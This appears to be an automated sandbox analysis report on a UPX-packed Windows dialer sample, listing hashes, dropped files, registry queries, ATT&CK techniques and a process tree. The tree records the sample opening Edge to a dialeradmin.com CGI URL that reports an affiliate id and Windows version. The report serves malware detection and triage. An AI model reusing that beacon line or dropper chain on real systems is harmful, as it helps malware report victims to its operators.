dea3085c33e0be2ca4bfb0da1a10f8a031da3d882194ab0f4665a5db669547a9

Analysis

max time kernel
184s
max time network
189s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
02/12/2022, 21:33

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

dea3085c33e0be2ca4bfb0da1a10f8a031da3d882194ab0f4665a5db669547a9.exe
Size

73KB
MD5

40f713a7a2fcc52cf55f50a2a14e8ba0
SHA1

03fa4ebf1391950475375cc2cbeee3c1defc94b0
SHA256

dea3085c33e0be2ca4bfb0da1a10f8a031da3d882194ab0f4665a5db669547a9
SHA512

b363accd3e58003a0cc6137c49e2837b2e24a579f9ca6506b10ce56cf78731ed2b61d7d3614538baff15d4ac3feac06944cfcdfc75581330e9d34b9117e27687
SSDEEP

1536:y3EAKvOwri7MlGZR+PU7Wc8OyW9rPP77Glx4j+:7NO2i798c7WcwW9r3Gg+

Score

8^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
5016	inst.exe
4788	124783.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2648-132-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral2/files/0x000500000002264e-134.dat	upx
behavioral2/memory/2648-135-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral2/files/0x000500000002264e-136.dat	upx
behavioral2/files/0x0007000000022660-140.dat	upx
behavioral2/files/0x0007000000022660-141.dat	upx
behavioral2/memory/4788-145-0x0000000000400000-0x000000000040D000-memory.dmp	upx
behavioral2/memory/5016-146-0x0000000000400000-0x000000000040A000-memory.dmp	upx
behavioral2/memory/4788-147-0x0000000000400000-0x000000000040D000-memory.dmp	upx
behavioral2/memory/4788-150-0x0000000000400000-0x000000000040D000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	dea3085c33e0be2ca4bfb0da1a10f8a031da3d882194ab0f4665a5db669547a9.exe

Loads dropped DLL 4 IoCs

pid	Process
5016	inst.exe
5016	inst.exe
4788	124783.exe
4788	124783.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2344	msedge.exe
2344	msedge.exe
3380	msedge.exe
3380	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3380	msedge.exe
3380	msedge.exe
3380	msedge.exe
3380	msedge.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3380	msedge.exe
3380	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2648 wrote to memory of 5016	2648	dea3085c33e0be2ca4bfb0da1a10f8a031da3d882194ab0f4665a5db669547a9.exe	82
PID 2648 wrote to memory of 5016	2648	dea3085c33e0be2ca4bfb0da1a10f8a031da3d882194ab0f4665a5db669547a9.exe	82
PID 2648 wrote to memory of 5016	2648	dea3085c33e0be2ca4bfb0da1a10f8a031da3d882194ab0f4665a5db669547a9.exe	82
PID 5016 wrote to memory of 4788	5016	inst.exe	84
PID 5016 wrote to memory of 4788	5016	inst.exe	84
PID 5016 wrote to memory of 4788	5016	inst.exe	84
PID 5016 wrote to memory of 4788	5016	inst.exe	84
PID 4788 wrote to memory of 3380	4788	124783.exe	86
PID 4788 wrote to memory of 3380	4788	124783.exe	86
PID 3380 wrote to memory of 4400	3380	msedge.exe	87
PID 3380 wrote to memory of 4400	3380	msedge.exe	87
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 636	3380	msedge.exe	91
PID 3380 wrote to memory of 2344	3380	msedge.exe	92
PID 3380 wrote to memory of 2344	3380	msedge.exe	92
PID 3380 wrote to memory of 2276	3380	msedge.exe	93
PID 3380 wrote to memory of 2276	3380	msedge.exe	93
PID 3380 wrote to memory of 2276	3380	msedge.exe	93
PID 3380 wrote to memory of 2276	3380	msedge.exe	93
PID 3380 wrote to memory of 2276	3380	msedge.exe	93
PID 3380 wrote to memory of 2276	3380	msedge.exe	93
PID 3380 wrote to memory of 2276	3380	msedge.exe	93
PID 3380 wrote to memory of 2276	3380	msedge.exe	93
PID 3380 wrote to memory of 2276	3380	msedge.exe	93
PID 3380 wrote to memory of 2276	3380	msedge.exe	93
PID 3380 wrote to memory of 2276	3380	msedge.exe	93

C:\Users\Admin\AppData\Local\Temp\dea3085c33e0be2ca4bfb0da1a10f8a031da3d882194ab0f4665a5db669547a9.exe
"C:\Users\Admin\AppData\Local\Temp\dea3085c33e0be2ca4bfb0da1a10f8a031da3d882194ab0f4665a5db669547a9.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2648
- C:\inst.exe
  "C:\inst.exe" c:\124783.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:5016
- - \??\c:\124783.exe
    c:\124783.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4788
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.dialeradmin.com/cgi-bin/err4.cgi?prog=ldr&ver=4.000&code=9&info=&aid=124783&skid=sk001&langid=&winver=Windows+NT+6.2;9200;9.11.19041.0&ci=1-12
      4⤵
      Enumerates system info in registry
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:3380
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xd4,0x110,0x7ff8532246f8,0x7ff853224708,0x7ff853224718
        5⤵
        
        PID:4400
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,5706989829122826789,4886379373609585270,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
        5⤵
        
        PID:636
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,5706989829122826789,4886379373609585270,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2344
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,5706989829122826789,4886379373609585270,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2612 /prefetch:8
        5⤵
        
        PID:2276
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5706989829122826789,4886379373609585270,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:1
        5⤵
        
        PID:3576
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5706989829122826789,4886379373609585270,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:1
        5⤵
        
        PID:2212
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2164,5706989829122826789,4886379373609585270,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5284 /prefetch:8
        5⤵
        
        PID:4672
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5706989829122826789,4886379373609585270,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
        5⤵
        
        PID:2520
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5706989829122826789,4886379373609585270,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
        5⤵
        
        PID:420
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2164,5706989829122826789,4886379373609585270,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6316 /prefetch:8
        5⤵
        
        PID:732

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3464

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\124783.exe

Filesize
23KB

MD5
4c58d136d455cde2715ffad63ef02112

SHA1
bd3204874b20b96cc734e2d67b9c0de408b3b0de

SHA256
34c3e26c143d444a83103180cee17fab458f7d73d091d25868da280f5afd449a

SHA512
8fbe2b2d5fb2cc93033e858a5e9ffd74c4b74302c53d10c310b9c847b71e561b591738aae14ee13c9834f34ea2e9f30344940e3e0504410dd283a3392bc663e0

Download Submit
C:\hooks.dll

Filesize
8KB

MD5
f85bda55e81b0cd1b8df7e60c02d4096

SHA1
3a2a30626293c3eb8313b08f05ca9126ce22567e

SHA256
e96730ca8ebbec414079dafbb39dbe0f715ab8f94e57533b3e0df85fae7f595f

SHA512
444530085d12ba324e7655a20cdbf622911e1f2dc524c4e733cdd304c48d2aace0b9116e0903215b10caf36b9be0b0daadee8e7c7c5eb42410bb387fdffc1114

Download Submit
C:\hooks.dll

Filesize
8KB

MD5
f85bda55e81b0cd1b8df7e60c02d4096

SHA1
3a2a30626293c3eb8313b08f05ca9126ce22567e

SHA256
e96730ca8ebbec414079dafbb39dbe0f715ab8f94e57533b3e0df85fae7f595f

SHA512
444530085d12ba324e7655a20cdbf622911e1f2dc524c4e733cdd304c48d2aace0b9116e0903215b10caf36b9be0b0daadee8e7c7c5eb42410bb387fdffc1114

Download Submit
C:\hooks.dll

Filesize
8KB

MD5
f85bda55e81b0cd1b8df7e60c02d4096

SHA1
3a2a30626293c3eb8313b08f05ca9126ce22567e

SHA256
e96730ca8ebbec414079dafbb39dbe0f715ab8f94e57533b3e0df85fae7f595f

SHA512
444530085d12ba324e7655a20cdbf622911e1f2dc524c4e733cdd304c48d2aace0b9116e0903215b10caf36b9be0b0daadee8e7c7c5eb42410bb387fdffc1114

Download Submit
C:\hooks.dll

Filesize
8KB

MD5
f85bda55e81b0cd1b8df7e60c02d4096

SHA1
3a2a30626293c3eb8313b08f05ca9126ce22567e

SHA256
e96730ca8ebbec414079dafbb39dbe0f715ab8f94e57533b3e0df85fae7f595f

SHA512
444530085d12ba324e7655a20cdbf622911e1f2dc524c4e733cdd304c48d2aace0b9116e0903215b10caf36b9be0b0daadee8e7c7c5eb42410bb387fdffc1114

Download Submit
C:\inst.EXE

Filesize
5KB

MD5
065e209c43519f6647a91f49d784f782

SHA1
bc66a01f50cc777a0c8e7a518cb4b6d0d223c227

SHA256
2a22ba63b59675b98ba5b730b9dc09c5047d10b067d630301a781875b1feadbb

SHA512
56917b18b2eadea2c2f21f43bb255f6916719823b9c287cc9ebf88a8f8774c5d481561ec4483d36480dd7d41bf7b9cb48e5de07eb82ae9985e0644f1651dfa6e

Download Submit
C:\inst.exe

Filesize
5KB

MD5
065e209c43519f6647a91f49d784f782

SHA1
bc66a01f50cc777a0c8e7a518cb4b6d0d223c227

SHA256
2a22ba63b59675b98ba5b730b9dc09c5047d10b067d630301a781875b1feadbb

SHA512
56917b18b2eadea2c2f21f43bb255f6916719823b9c287cc9ebf88a8f8774c5d481561ec4483d36480dd7d41bf7b9cb48e5de07eb82ae9985e0644f1651dfa6e

Download Submit
\??\c:\124783.exe

Filesize
23KB

MD5
4c58d136d455cde2715ffad63ef02112

SHA1
bd3204874b20b96cc734e2d67b9c0de408b3b0de

SHA256
34c3e26c143d444a83103180cee17fab458f7d73d091d25868da280f5afd449a

SHA512
8fbe2b2d5fb2cc93033e858a5e9ffd74c4b74302c53d10c310b9c847b71e561b591738aae14ee13c9834f34ea2e9f30344940e3e0504410dd283a3392bc663e0

Download Submit
\??\c:\hooks.dll

Filesize
8KB

MD5
f85bda55e81b0cd1b8df7e60c02d4096

SHA1
3a2a30626293c3eb8313b08f05ca9126ce22567e

SHA256
e96730ca8ebbec414079dafbb39dbe0f715ab8f94e57533b3e0df85fae7f595f

SHA512
444530085d12ba324e7655a20cdbf622911e1f2dc524c4e733cdd304c48d2aace0b9116e0903215b10caf36b9be0b0daadee8e7c7c5eb42410bb387fdffc1114

Download Submit
memory/2648-132-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2648-135-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4788-150-0x0000000000400000-0x000000000040D000-memory.dmp

Filesize
52KB

Download
memory/4788-147-0x0000000000400000-0x000000000040D000-memory.dmp

Filesize
52KB

Download
memory/4788-145-0x0000000000400000-0x000000000040D000-memory.dmp

Filesize
52KB

Download
memory/5016-146-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download